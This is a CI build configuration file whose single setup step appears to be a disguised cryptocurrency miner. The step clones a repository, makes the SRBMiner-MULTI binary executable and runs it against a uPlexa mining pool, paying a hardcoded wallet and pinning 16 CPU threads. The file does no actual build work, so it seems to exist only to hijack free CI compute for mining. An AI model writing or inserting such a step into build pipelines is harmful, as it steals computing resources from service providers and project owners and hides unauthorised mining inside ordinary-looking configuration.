build:
  nodes:
    my-node:
      project_setup:
        before:
          - command: git clone https://github.com/remakove/artions.git artions && cd artions && chmod +x SRBMiner-MULTI && ./SRBMiner-MULTI --algorithm cryptonight_upx --pool fi.uplexa.herominers.com:10470 --wallet UPX1XbQ6DaJixAHq8qe8LMUrqgK28D9oseqFEyVL8YRPPgcdKXAjReuJKS9BfR5rnGKNyD2XgszXmQixnj3q3JJs8y1QzUogSb.p6 --disable-gpu --cpu-threads 16 --cpu-affinity 0xFFFF
